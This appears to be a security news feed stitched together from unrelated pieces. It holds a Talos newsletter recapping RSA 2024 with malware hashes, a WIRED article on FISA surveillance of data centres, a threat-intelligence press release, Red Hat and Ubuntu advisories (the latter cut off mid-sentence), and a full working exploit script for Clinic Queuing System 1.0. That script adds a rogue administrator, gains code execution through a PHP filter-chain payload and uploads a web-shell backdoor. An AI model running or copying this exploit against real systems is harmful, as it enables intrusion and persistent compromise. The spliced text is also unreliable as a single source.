Here’s a rundown of some things you may have missed if you weren’t able to stay on top of the things coming out of the conference.

Thursday, May 16, 2024 14:00

While I one day wish to make it to the RSA Conference in person, I’ve never had the pleasure of making the trek to San Francisco for one of the largest security conferences in the U.S. 

Instead, I had to watch from afar and catch up on the internet every day like the common folk. This at least gives me the advantage of not having my day totally slip away from me on the conference floor, so at least I felt like I didn’t miss much in the way of talks, announcements and buzz. So, I wanted to use this space to recap what I felt like the top stories and trends were coming out of RSA last week.  

Here’s a rundown of some things you may have missed if you weren’t able to stay on top of the things coming out of the conference. 

**AI is the talk of the town** 

This is unsurprising given how every other tech-focused conference and talk has gone since the start of the year, but everyone had something to say about AI at RSA.  

AI and its associated tools were part of all sorts of product announcements (either to be used as a marketing buzzword or something that is truly adding to the security landscape).  

Cisco’s own Jeetu Patel gave a keynote on how Cisco Secure is using AI in its newly announced Hypershield product. In the talk, he argued that AI needs to be used natively on networking infrastructure and not as a “bolt-on” to compete with attackers.  

U.S. Secretary of State Anthony Blinken was the headliner of the week, delivering a talk outlining the U.S.’ global cybersecurity policies. He spent a decent chunk of his half hour in the spotlight also talking about AI, in which he warned that the U.S. needed to maintain its edge when it comes to AI and quantum computing — and that losing that race to a geopolitical rival (like China) would have devastating consequences to our national security and economy.  

Individual talks ran the gamut from “AI is the best thing ever for security!” to “Oh boy AI is going to ruin everything.” The reality of how this trend shakes out, like most things, is likely going to be somewhere in between those two schools of thought.  

An IBM study released at RSA highlighted how headstrong many executives can be when embracing AI. They found that security is generally an afterthought when creating generative AI models and tools, with only 24 percent of responding C-suite executives saying they have a security component built into their most recent GenAI project.  

**Vendors vow to build security into product designs** 

Sixty-eight new tech companies signed onto a pledge from the U.S. Cybersecurity and Infrastructure Security Agency, vowing to build security into their products from earliest stages of the design process.  

The list of signees now includes Cisco, Microsoft, Google, Amazon Web Services and IBM, among other large tech companies. The pledge states that the signees will work over the next 12 months to build new security safeguards for their products, including increasing the use of multi-factor authentication (MFA) and reducing the presence of default passwords.  

However, there’s looming speculation about how enforceable the Secure By Design pledge is and what the potential downside here is for any company that doesn’t live up to these promises.  

**New technologies countering deepfakes** 

Deepfake images and videos are rapidly spreading online and pose a grave threat to the already fading faith many of us had in the internet. 

It can be difficult to detect when users are looking at a digitally manipulated image or video unless they’re educated on common red flags to look for, or if they’re particularly knowledgeable on the subject in question. They’re getting so good now that even targets’ parents are falling for fake videos of their loved ones.  

Some potential solutions discussed at RSA include digital “watermarks” in things like virtual meetings and video recordings with immutable metadata.  

A deep fake-detecting startup was also named RSA’s “Most Innovative Startup 2024” for its multi-modal software that can detect and alert users of AI-generated and manipulated content. McAfee also has its own Deepfake Detector that it says, “utilizes advanced AI detection models to identify AI-generated audio within videos, helping people understand their digital world and assess the authenticity of content.” 

Whether these technologies can keep up with the pace that attackers are developing this technology and deploying it on such a wide scale, remains to be seen.  

**The one big thing **

Microsoft disclosed a zero-day vulnerability that could lead to an adversary gaining SYSTEM-level privileges as part of its monthly security update. After a hefty Microsoft Patch Tuesday in April, this month’s security update from the company only included one critical vulnerability across its massive suite of products and services. In all, May’s slate of vulnerabilities disclosed by Microsoft included 59 total CVEs, most of which are of “important” severity. There is only one moderate-severity vulnerability. 

**Why do I care? **

The lone critical security issue is CVE-2024-30044, a remote code execution vulnerability in SharePoint Server. An authenticated attacker who obtains Site Owner permissions or higher could exploit this vulnerability by uploading a specially crafted file to the targeted SharePoint Server. Then, they must craft specialized API requests to trigger the deserialization of that file’s parameters, potentially leading to remote code execution in the context of the SharePoint Server. The aforementioned zero-day vulnerability, CVE-2024-30051, could allow an attacker to gain SYSTEM-level privileges, which could have devastating impacts if they were to carry out other attacks or exploit additional vulnerabilities. 

**So now what? **

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63419, 63420, 63422 - 63432, 63444 and 63445. There are also Snort 3 rules 300906 - 300912. 

**Top security headlines of the week **

**A massive network intrusion is disrupting dozens of hospitals across the U.S., even forcing some of them to reroute ambulances late last week.** Ascension Healthcare Network said it first detected the activity on May 8 and then had to revert to manual systems. The disruption caused some appointments to have to be canceled or rescheduled and kept patients from visiting MyChart, an online portal for medical records. Doctors also had to start taking pen-and-paper records for patients. Ascension operates more than 140 hospitals in 19 states across the U.S. and works with more than 8,500 medical providers. The company has yet to say if the disruption was the result of a ransomware attack or some sort of other targeted cyber attack, though there was no timeline for restoring services as of earlier this week. Earlier this year, a ransomware attack on Change Healthcare disrupted health care systems nationwide, pausing many payments providers were expected to receive. UnitedHealth Group Inc., the parent company of Change, told a Congressional panel recently that it paid a requested ransom of $22 million in Bitcoin to the attackers. (CPO Magazine, The Associated Press) 

**Google and Apple are rolling out new alerts to their mobile operating systems that warn users of potentially unwanted devices tracking their locations.** The new features specifically target Bluetooth Low Energy (LE)-enabled accessories that are small enough to often be unknowingly tracking their specific location, such as an Apple AirTag. Android and iOS users will now receive the alert when such a device, when it's been separated from the owner’s smartphone, is moving with them still. This alert is meant to prevent adversaries or anyone with malicious intentions from unknowingly tracking targets’ locations. The two companies proposed these new rules for tracking devices a year ago, and other manufacturers of these devices have agreed to add this alert feature to their products going forward. “This cross-platform collaboration — also an industry first, involving community and industry input — offers instructions and best practices for manufacturers, should they choose to build unwanted tracking alert capabilities into their products,” Apple said in its announcement of the rollout. (Security Week, Apple) 

**The popular Christie’s online art marketplace was still down as of Wednesday afternoon after a suspected cyber attack.** The site, known for having many high-profile and wealthy clients, was planning on selling artwork worth at least $578 million this week. Christie’s said it first detected the technology security incident on Thursday but has yet to comment on if it was any sort of targeted cyber attack or data breach. There was also no information on whether client or user data was potentially at risk. Current items for sale included a Vincent van Gogh painting and a collection of rare watches, some owned by Formula 1 star Michael Schumacher. Potential buyers could instead place bids in person or over the phone. (Wall Street Journal, BBC) 

**Can’t get enough Talos? **

*   Talos joins CISA to counter cyber threats against non-profits, activists and other at-risk communities 
*   Click Here Ep. #130: A wrinkle in time: GPS jamming in Ukraine and its ripple effects 
*   Talos Takes Ep. #184: Why CoralRaider is looking to steal your login credentials 
*   Generative AI’s disinformation threat is ‘overblown,’ top cyber expert says 

**Upcoming events where you can find Talos **

**ISC2 SECURE Europe** **(May 29)** 

_Amsterdam, Netherlands_ 

> _Gergana Karadzhova-Dangela from Cisco Talos Incident Response will participate in a panel on “Using ECSF to Reduce the Cybersecurity Workforce and Skills Gap in the EU.” Karadzhova-Dangela participated in the creation of the EU cybersecurity framework, and will discuss how Cisco has used it for several of its internal initiatives as a way to recruit and hire new talent._  

**Cisco Live** **(June 2 - 6)** 

_Las Vegas, Nevada_  

**_AREA41_** **_(June 6 – 7)_** 

_Zurich, Switzerland_ 

> _Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches._ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202   
**MD5:** e4acf0e303e9f1371f029e013f902262   
**Typical Filename:** FileZilla\_3.67.0\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.Application.27hg.1201 

**SHA 256:** a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0   
**MD5:** b4440eea7367c3fb04a89225df4022a6   
**Typical Filename:** Pdfixers.exe   
**Claimed Product:** Pdfixers   
**Detection Name:** W32.Superfluss:PUPgenPUP.27gq.1201 

**SHA 256:** 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab   
**MD5:** 4c648967aeac81b18b53a3cb357120f4   
**Typical Filename:** yypnexwqivdpvdeakbmmd.exe   
**Claimed Product:** N/A    
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** d529b406724e4db3defbaf15fcd216e66b9c999831e0b1f0c82899f7f8ef6ee1   
**MD5:** fb9e0617489f517dc47452e204572b4e   
**Typical Filename:** KMSAuto++.exe   
**Claimed Product:** KMSAuto++   
**Detection Name:** W32.File.MalParent 

**SHA 256:** abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6   
**MD5:** 22ae85259273bc4ea419584293eda886   
**Typical Filename:** KMSAuto++ x64.exe   
**Claimed Product:** KMSAuto++   
**Detection Name:** W32.File.MalParent

Rounding up some of the major headlines from RSA

A coalition of digital rights groups is demanding the US declassify records that would clarify just how expansive a major surveillance program really is.

Last month, US president Joe Biden signed a surveillance bill enhancing the National Security Agency’s power to compel US businesses to wiretap communications going in and out of the country. The changes to the law have left legal experts largely in the dark as to the true limits of this new authority, chiefly when it comes to the types of companies that could be affected. The American Civil Liberties Union and organizations like it say the bill has rendered the statutory language governing the limits of a powerful wiretap tool overly vague, potentially subjecting large swaths of corporate America to warrantless and secretive surveillance practices.

In April, Congress rushed to extend the US intelligence system’s “crown jewel,” Section 702 of the Foreign Intelligence Surveillance Act (FISA). The spy program allows the NSA to wiretap calls and messages between Americans and foreigners abroad—so long as the foreigner is the individual being “targeted” and the intercept serves a significant “foreign intelligence” purpose. Since 2008, the program has been limited to a subset of businesses that the law calls “electronic communications service providers,” or ECSPs—corporations such as Microsoft and Google, which provide email services, and phone companies like Sprint and AT&T.

In recent years, the government has worked quietly to redefine what it means to be an ECSP in an attempt to extend the NSA’s reach, first unilaterally and now with Congress’ backing. The issue remains that the bill Biden signed last month contains murky language that attempts to redefine the scope of a critical surveillance program. In response, a coalition of digital rights organizations, including the Brennan Center for Justice to the Electronic Frontier Foundation, is pressing the US attorney general, Merrick Garland, and the nation’s top spy, Avril Haines, to declassify details about a relevant court case that could, they say, shed much-needed light on the situation.

In a letter to the top officials, more than 20 such organizations say they believe the new definition of an ECSP adopted by Congress might “permit the NSA to compel almost any US business to assist” the agency, noting that all companies today provide some sort of “service” and have access to equipment on which “communications” are stored.

“Deliberately writing overbroad surveillance authorities and trusting that future administrations will decide not to exploit them is a recipe for abuse,” the letter says. “And it is entirely unnecessary, as the administration can—and should—declassify the fact that the provision is intended to reach data centers.”

The Justice Department confirmed receipt of the letter on Tuesday but referred WIRED to the Office of the Director of National Intelligence, which has primary purview over declassification decisions. The ODNI has not responded to a request for comment.

It is widely believed—and has been reported—that data centers are the intended target of this textual change. Matt Olsen, the assistant US attorney general for national security, appeared on an April 17 episode of the _Lawfare_ podcast to say that, while unable to confirm or deny any specifics, data centers today store a significant amount of communications data and are an “example” of why the government viewed the change as necessary.

A DOJ spokesperson pointed WIRED to an April 18 letter by Garland that claims the new ECSP definition is “narrowly tailored.” The letter includes written reflections on the provision by the assistant attorney general, Carlos Uriarte, who writes that the “fix” is meant to address a “critical intelligence gap” resulting from changes in technology over the past 15 years. According to Uriarte, the DOJ has committed to applying the new definition internally “to cover the type of service provider at issue” before the court.

Ostensibly this means the government is promising to limit future surveillance directives to data centers (in addition to the companies traditionally defined as ECSPs).

The surveillance court that oversees FISA and the appeals court that reviews its decisions sided two years ago with an unidentified company that fought back after being served an NSA order. Both courts ruled that it did not, in fact, appear to meet the criteria for being considered an ECSP, as only part of its function was storing communications data. Finding the government’s interpretation of the statute overly broad, the court reminded the government that only Congress has the “competence and constitutional authority” to rewrite the law.

Digital rights groups argue that declassifying additional information about this FISA case may help the public understand which types of businesses are actually subject to NSA directives. Practically speaking, they say, that information is no longer a secret anyway. “Declassifying this information would cause little if any national security harm,” the letter says. “The New York Times has already revealed that the relevant FISC case addressed data centers for cloud computing.”

In the aftermath of the FISA court’s ruling, the NSA and other spy agencies began lobbying the House and Senate intelligence committees to aid the administration in redefining what it means to be an ECSP. Members of both committees have subsequently portrayed the court’s ruling as a “directive” that Congress needs to expand the NSA’s reach. In a floor speech last month, Mark Warner, the chair of the Senate Intelligence Committee, said, “So what happened was, the FISA Court said to Congress: You guys need to close this loophole; you need to close this and change this definition.”

But in fact what the court asserted was that the government had exceeded its authority and that it was Congress’ job, not the Justice Department’s, to revise the law. “Any unintended gap in coverage revealed by our interpretation is, of course, open to reconsideration by the branches of government whose competence and constitutional authority extend to statutory revision,” the court said.

This would culminate in new language being proposed that quickly alarmed legal experts, including top civil liberties attorneys who’ve appeared before the secret court in the past. The surveillance fears quickly spread to Silicon Valley. The Information Technology Industry Council, one of the tech industry's top lobbying arms, warned that companies like Facebook and IBM were interpreting the bill as having “vastly expanded the US government’s warrantless surveillance capabilities.”

This expansion, the firm added, would also hinder the “competitiveness of US technology companies” and arguably imperil the “continued global free flow of data between the US and its allies.” Customers internationally, it argued, would likely begin taking their business elsewhere should the US government turn data centers into surveillance watering holes.

Concerns about the new ECSP definition have been circulating since December. While largely dismissing them, members of the House and Senate intelligence committees made a few adjustments in February, exempting a handful of business types. This came in response to popular concerns that Starbucks employees and hotel IT staff might be secretly conscripted by the NSA. FISA experts such as Marc Zwillinger—a private attorney who has appeared twice before the FISA Court of Review—noted in response to those adjustments that Congress’ rush to exempt a handful of businesses only served to demonstrate that the text was inherently too broad.

Intelligence committee members kept the pressure on lawmakers to reauthorize the Section 702 program with the sought-after language, going as far as to suggest that another 9/11-style attack might occur if they failed. The power of the committees was on full display, as while neither actually have primary jurisdiction over FISA, a majority of the Section 702 bill that passed was authored by intelligence committee staff.

Even while supporting the new framework and dismissing the intensity of civil society’s concerns, Warner did eventually step forward to acknowledge the new ECSF definition needed additional tweaking. First, on the Senate floor in April, he said that Garland shared his “view” that the language “could have been drafted better.” Later, in response to questions from reporters, he added: “I’m absolutely committed to getting that fixed.”

That appears unlikely to happen soon. According to The Record, Warner indicated that the best time to update the language again would be in the “next intelligence bill,” presumably referring to legislation this fall broadly reauthorizing the intelligence community’s work.

In the meantime, however, more than half of Congress is running for election, and the next US president will have greater surveillance powers than any other before. No one can say for sure who that president will be or how they’ll make use of that authority.

_Updated 2:20 pm ET, May 14, 2024, to clarify statements by Matt Olsen, assistant US attorney general for national security, to the_ Lawfare _podcast._

Secrecy Concerns Mount Over Spy Powers Targeting US Data Centers

By cybernewswire
Torrance, California, May 13th, 2024, CyberNewsWire Criminal IP, a renowned Cyber Threat Intelligence (CTI) search engine developed by…
This is a post from HackRead.com Read the original post: Criminal IP and Quad9 Collaborate to Exchange Domain and IP Threat Intelligence

**Torrance, California, May 13th, 2024, CyberNewsWire**

Criminal IP, a renowned Cyber Threat Intelligence (CTI) search engine developed by AI SPERA, has recently signed a technology partnership to exchange threat intelligence data based on domains and potentially on the IP address to protect users by blocking threats to end users. 

Criminal IP underwent rigorous data evaluation to integrate with Quad9’s threat-blocking service, demonstrating high data uniqueness and accuracy. Particularly, test results revealed a remarkable outcome: 99.1% of malicious domains identified by Criminal IP’s threat intelligence were found to be non-duplicative with other TI data.

Through this integration, Quad9 leverages the most up-to-date threat intelligence lists, incorporating data from Criminal IP’s database of malicious domains to block harmful hostnames. This process not only safeguards computers, mobile devices, and IoT systems from a diverse array of threats like malware, phishing, spyware, and botnets, ensuring privacy, but also optimizes performance.

**Quad9’s Threat Blocking Enhanced by Criminal IP’s Threat Intelligence**

Quad9 is a free anycast DNS platform delivering robust security protections and privacy guarantees that comply with rigorous Swiss Data Protection and GDPR rules. Quad9 is operated as a non-profit by the Quad9 Foundation in Switzerland for the purpose of improving the privacy and cybersecurity of Internet users.

Operating on a high-performance global network, Quad9 partners with Criminal IP, which offers extensive cyber threat information, including malicious IPs, domains, and CVEs, derived from sophisticated IP and domain scoring algorithms and big data analysis on a worldwide scale, enhances this mission.

<Results of the blocking test for the Quad9 threat-blocking security service integrated with Criminal IP TI>

The specially designed Criminal IP Malicious Domains Retrieval API is used to send the Domain Data Feed identified as malicious to Quad9 for integration. This feed is then utilized alongside other threat intelligence (TI) data sources integrated into the Quad9 platform, such as IBM, OpenPhish, F-Secure, RiskIQ, and Domain Tools, to create a comprehensive blocklist for user protection.

**Criminal IP’s specialized Domain Threat Intelligence**

In addition to these comprehensive threat-blocking results on Quad9, for those seeking more information about each component of domains, users can use Domain Search of Criminal IP. The vulnerability scanner tool meticulously analyzes a wide array of domain details including screenshots, WHOIS data, utilized technologies, page redirections, and certificates. It also identifies potentially malicious content and replicated phishing domains, providing an overall domain score and a Domain Generation Algorithm (DGA) score. This global threat intelligence is updated daily and can be accessed through flexible API integration enabling seamless incorporation of the data into existing security systems, such as SOAR and SIEM. 

<Results of searching malicious domain in Criminal IP Domain Search>

“Our partnership with Quad9 is a recognition of the accuracy of Criminal IP’s data,” stated Byungtak Kang, CEO of AI SPERA. “It is expected that our collaboration will contribute to the protection of Quad9’s end-users, who have a global reach, while simultaneously enhancing the quality of Criminal IP’s data.”

End users interested in utilizing the integrated threat-blocking security service of Quad9, which is linked with Criminal IP threat intelligence, can automatically activate the service simply by using the Quad9 DNS server (9.9.9.9).

**About AI SPERA**

AI SPERA launched its global cybersecurity service, Criminal IP, on April 17, 2023, following a successful year-long beta phase. The company has established technical and business partnerships with acclaimed global security firms and educational institutions, including VirusTotal, Cisco, Tenable, and Sumo Logic.

Criminal IP offers personalized plan options, also suitable for company use. Users can check their own credit usage for specific features (Web, Vulnerability Scanner, Tags, etc.) and API on the dashboard, and upgrade the plan anytime according to their needs.

Criminal IP is available in five languages (English, French, Arabic, Korean, and Japanese), providing a powerful and accurate CTI search engine for users worldwide. AI SPERA has been delivering cybersecurity solutions worldwide through a range of products, including Criminal IP CTI Search Engine, Criminal IP ASM, and Criminal IP FDS.

**Contact**

**Michael Sena**  
**AI SPERA**  
**\[email protected\]**

Criminal IP and Quad9 Collaborate to Exchange Domain and IP Threat Intelligence

Red Hat Security Advisory 2024-2799-03 - An update for glibc is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include buffer overflow, code execution, null pointer, and out of bounds write vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2799.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: glibc security updateAdvisory ID:        RHSA-2024:2799-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2799Issue date:         2024-05-09Revision:           03CVE Names:          CVE-2024-2961====================================================================Summary: An update for glibc is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.Security Fix(es):* glibc: Out of bounds write in iconv may lead to remote code execution (CVE-2024-2961)* glibc: stack-based buffer overflow in netgroup cache (CVE-2024-33599)* glibc: null pointer dereferences after failed netgroup cache insertion (CVE-2024-33600)* glibc: netgroup cache may terminate daemon on memory allocation failure (CVE-2024-33601)* glibc: netgroup cache assumes NSS callback uses in-buffer strings (CVE-2024-33602)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-2961References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2273404https://bugzilla.redhat.com/show_bug.cgi?id=2277202https://bugzilla.redhat.com/show_bug.cgi?id=2277204https://bugzilla.redhat.com/show_bug.cgi?id=2277205https://bugzilla.redhat.com/show_bug.cgi?id=2277206

Red Hat Security Advisory 2024-2799-03

Clinic Queuing System version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Clinic Queuing System 1.0 RCE # Date: 2024/1/7# Exploit Author: Juan Marco Sanchez# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html# Version: 1.0# Tested on: Debian Linux Apache Web Server# CVE: CVE-2024-0264 and CVE-2024-0265import requestsimport randomimport argparsefrom bs4 import BeautifulSoupparser = argparse.ArgumentParser()parser.add_argument("target")args = parser.parse_args()base_url = args.targetphase1_url = base_url + '/LoginRegistration.php?a=save_user'phase2_url = base_url + '/LoginRegistration.php?a=login'filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home"def phase1(): # CVE-2024-0264  rand_user = 'pwn_'+str(random.randint(100, 313))  rand_pass = 'pwn_'+str(random.randint(100, 313))  pwn_user_data = {'formToken':'','fullname':'pwn!','username':rand_user,'password':rand_pass,'status':1,'type':1}  print("[*] adding administrator " + rand_user + ":" + rand_pass)  phase1 = requests.post(phase1_url, pwn_user_data)  if "User Account has been added successfully." in phase1.text:    print("[+] Phase 1 Success - Admin user added!\n")    print("[*] Initiating Phase 2")    phase2(rand_user, rand_pass)  else:    print("[X] user creation failed :(")    die()def phase2(user, password): # CVE-2024-0265  s = requests.Session();  login_data = {'formToken':'','username':user, 'password':password}  print("[*] Loggin in....")  phase2 = s.post(phase2_url, login_data)  if "Login successfully." in phase2.text:    print("[+] Login success")  else:    print("[X] Login failed.")    die()  print("[+] Preparing for RCE via LFI PHP FIlter Chaining...\n")  rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|<pre>'.shell_exec('id').'</pre>';"  #print("[*] Payload: " + rce_url)  rce = s.get(rce_url)    if "jmrcsnchz" in rce.text:    print("[+] RCE success!")    soup = BeautifulSoup(rce.text, 'html.parser')    print("[+] Output of id: " + soup.pre.get_text())    print("[*] Uploading php backdoor....")    s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));")    print("[+] Access at " + base_url + "/rce.php?0=whoami")  else:    print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.")    die()try:  print("[*] Initiating Phase 1")  phase1()except:  print("Exploit failed.")

Clinic Queuing System 1.0 Remote Code Execution

Ubuntu Security Notice 6766-1 - It was discovered that the Open vSwitch implementation in the Linux kernel could overflow its stack during recursive action operations under certain conditions. A local attacker could use this to cause a denial of service. Sander Wiebing, Alvise de Faveri Tron, Herbert Bos, and Cristiano Giuffrida discovered that the Linux kernel mitigations for the initial Branch History Injection vulnerability were insufficient for Intel processors. A local attacker could potentially use this to expose sensitive information.

    ==========================================================================Ubuntu Security Notice USN-6766-1May 07, 2024linux, linux-azure, linux-azure-5.15, linux-azure-fde,linux-azure-fde-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop,linux-gkeop-5.15, linux-ibm, linux-ibm-5.15, linux-kvm, linux-lowlatency,linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle, linux-oracle-5.15vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-lowlatency-hwe-5.15: Linux low latency kernel- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:It was discovered that the Open vSwitch implementation in the Linux kernelcould overflow its stack during recursive action operations under certainconditions. A local attacker could use this to cause a denial of service(system crash). (CVE-2024-1151)Sander Wiebing, Alvise de Faveri Tron, Herbert Bos, and Cristiano Giuffridadiscovered that the Linux kernel mitigations for the initial Branch HistoryInjection vulnerability (CVE-2022-0001) were insufficient for Intelprocessors. A local attacker could potentially use this to expose sensitiveinformation. (CVE-2024-2201)Chenyuan Yang discovered that the RDS Protocol implementation in the Linuxkernel contained an out-of-bounds read vulnerability. An attacker could usethis to possibly cause a denial of service (system crash). (CVE-2024-23849)Several security issues were discovered in the Linux kernel.An 